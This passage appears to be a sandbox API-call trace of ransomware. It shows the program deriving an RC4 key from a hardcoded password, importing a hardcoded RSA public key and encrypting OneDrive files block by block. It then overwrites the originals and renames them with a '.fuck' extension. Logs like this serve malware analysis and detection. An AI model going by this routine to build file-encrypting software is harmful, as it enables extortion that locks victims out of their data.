(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppWhite.png.gsg", dwFileAttributes=0x2) returned 1 [0272.403] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0272.405] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0272.405] lstrlenA (lpString="aECpWcPppDlAmtrTSptkyOWgzMlQm") returned 29 [0272.405] CryptHashData (hHash=0x2fa748, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0272.405] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa748, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa4c8) returned 1 [0272.405] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0272.406] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0272.406] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f27aa0) returned 1 [0272.406] CryptImportPublicKeyInfo (in: hCryptProv=0x2f27aa0, dwCertEncodingType=0x1, pInfo=0x2f32df0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f32e20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f32e28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fac08) returned 1 [0272.406] CryptEncrypt (in: hKey=0x2fac08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0272.406] CryptEncrypt (in: hKey=0x2fac08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f27b28*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f27b28*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0272.406] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f27b28*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f27b28*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0272.407] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.422] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.422] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.426] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.426] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.426] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.426] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.427] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.427] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.427] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x16b, lpOverlapped=0x0) returned 1 [0272.427] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x16b, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x170) returned 1 [0272.427] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x170, lpOverlapped=0x0) returned 1 [0272.427] CloseHandle (hObject=0x5d4c) returned 1 [0272.427] CloseHandle (hObject=0x5d3c) returned 1 [0272.427] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppWhite.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\appwhite.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppWhite.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\appwhite.png"), bFailIfExists=0) returned 1 [0272.431] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppWhite.png", dwFileAttributes=0x0) returned 1 [0272.432] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppWhite.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\appwhite.png.gsg")) returned 1 [0272.433] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppWhite.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\appwhite.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppWhite.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\appwhite.png.fuck")) returned 1 [0272.434] CryptDestroyHash (hHash=0x2fa748) returned 1 [0272.434] CryptDestroyKey (hKey=0x2fa4c8) returned 1 [0272.434] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0272.434] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0272.434] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0272.435] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0272.435] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0272.435] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0272.435] GetLastError () returned 0x0 [0272.435] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ar\\filesync.localizedresources.dll.mui")) returned 0x20 [0272.435] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0272.436] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ar\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0272.437] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ar\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0272.438] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0272.438] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f27dd0) returned 1 [0272.442] CryptCreateHash (in: hProv=0x2f27dd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0272.442] lstrlenA (lpString="aECpWcPppDlAmtrTSptkyOWgzMlQm") returned 29 [0272.442] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb738, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0272.442] CryptDeriveKey (in: hProv=0x2f27dd0, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fa988) returned 1 [0272.442] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0272.442] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0272.442] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f27c38) returned 1 [0272.443] CryptImportPublicKeyInfo (in: hCryptProv=0x2f27c38, dwCertEncodingType=0x1, pInfo=0x2f319a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f319d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f319d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fafc8) returned 1 [0272.443] CryptEncrypt (in: hKey=0x2fafc8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0272.443] CryptEncrypt (in: hKey=0x2fafc8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f27bb0*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f27bb0*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0272.443] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f27bb0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f27bb0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0272.445] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.454] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.454] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.457] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.457] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.457] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.457] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.457] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.457] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.457] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.457] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.457] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.458] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.458] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.458] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.458] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.458] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.458] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.458] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.458] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.458] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.459] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.459] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.459] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.459] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.459] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.459] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.459] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.459] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.459] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.459] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.460] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.460] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.460] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.460] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.460] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.460] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.460] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.460] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.460] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.460] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.460] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.461] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.461] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.461] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.461] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.461] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.461] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.461] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 